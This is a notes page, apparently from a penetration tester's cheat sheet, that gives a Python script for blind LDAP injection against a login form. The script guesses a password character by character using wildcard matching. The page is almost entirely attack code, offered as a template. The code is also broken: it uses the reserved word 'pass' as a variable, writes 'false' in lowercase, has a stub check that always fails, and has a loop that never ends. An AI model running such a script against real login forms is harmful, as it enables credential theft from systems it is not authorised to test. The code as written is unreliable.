xct's notes
Search…
LDAP Injection
Example of retrieving a password using blind LDAP injection from a login form:
1
#!/usr/bin/python3
2
3
import requests
4
import string
5
import re
6
7
charset = "{}_-" + string.ascii_letters + string.digits
8
url = '<url>'
9
10
def go(p):
11
d = {"username": "<username>", "password": f"{p}*"}
12
r = requests.post(url + '/login', allow_redirects=False, data=d)
13
# return true on success, false on error depending on the response
14
return false
15
16
pass = ""
17
while True:
18
for c in charset:
19
if go(pass + c):
20
pass += c
21
print(pass)
Copied!
Last modified 1yr ago
Copy link